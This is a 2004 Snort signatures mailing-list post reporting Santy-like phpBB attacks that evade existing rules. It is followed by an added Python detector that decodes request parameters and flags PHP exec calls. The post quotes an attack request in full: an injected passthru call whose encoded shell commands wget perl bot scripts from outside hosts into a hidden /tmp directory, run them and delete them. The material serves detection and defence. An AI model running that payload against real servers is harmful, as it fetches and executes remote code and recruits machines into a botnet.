[Snort-sigs] Santy (sort of) doesn't trigger any rule

Guy Marcenac guy.marc at ...2146...
Thu Dec 30 02:44:03 EST 2004


Hello,

I got an increasing number of attacks looking like santy. But they never 
trigger any of the rules I use (official snort set 2.2 and bleeding 
snort set, updated every night).

There are seven different patterns (the most frequent is attached 
below). The attacks come from lots of different IPs, which seem to have a 
webserver running.
They try to use an existing webalizer html page (which itself contains 
references to a viewtopic.php file). Of course, it fails.

I'm not sure if this could really hurt if used with a real php page, but 
I think so.

I can post a complete sample of these attacks if needed.

GET 
/webalizer/usage_200407.html&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20killall%20-9%20perl;cd%20/tmp;mkdir%20.temp22;cd%20.temp22;wget%20http://www.abcft.org/themes/bot.htm;wget%20http://http://weblicious.com/.notes/ssh2.htm;perl%20ssh2.htm;rm%20ssh.htm;perl%20bot.htm;rm%20bot.htm%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527';

-- 
guy
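
A detection check for the request quoted in the post above, as an added example that is not part of the original message: it splits parameters even though the URI has no `?`, percent-decodes each value until it stops changing (the `highlight` value is double-encoded), and reports a PHP command-execution call whatever page is requested. The function names are hypothetical, and the sample is the post's request shortened, with the shell commands left out.

```python
import re
from urllib.parse import unquote

# Constructed sample: the request from the post, shortened (the shell commands
# between the _START_ and _END_ markers are left out).
SAMPLE = ("GET /webalizer/usage_200407.html&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F"
          "&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54"
          "%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.0")

# PHP functions that run shell commands, and the variable lookup used as carrier.
PHP_EXEC = re.compile(r"\b(passthru|shell_exec|system|exec|popen)\s*\(", re.I)
VAR_REF = re.compile(r"\$HTTP_GET_VARS\[(\w+)\]")

def fully_decode(value, max_rounds=5):
    """Percent-decode until the value stops changing (%2527 -> %27 -> ')."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds

def split_params(uri):
    """Split on '?' and '&': the sample has parameters but no '?' at all."""
    path, *pairs = re.split(r"[?&]", uri)
    return path, dict(p.partition("=")[::2] for p in pairs)

def inspect_request(line):
    """Return one finding per parameter that decodes to a PHP exec call."""
    uri = line.split()[1]
    path, params = split_params(uri)
    findings = []
    for name, raw in params.items():
        text, rounds = fully_decode(raw)
        call = PHP_EXEC.search(text)
        if not call:
            continue
        ref = VAR_REF.search(text)
        carrier = ref.group(1) if ref else None
        command = fully_decode(params.get(carrier, ""))[0] if carrier else None
        findings.append({"path": path, "param": name, "rounds": rounds,
                         "function": call.group(1), "carrier": carrier,
                         "command": command})
    return findings

if __name__ == "__main__":
    for finding in inspect_request(SAMPLE):
        print(finding)
```

A `rounds` value of 2 on the flagged parameter marks the double encoding, and `path` shows that the target need not be a PHP script for the pattern to appear in logs.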



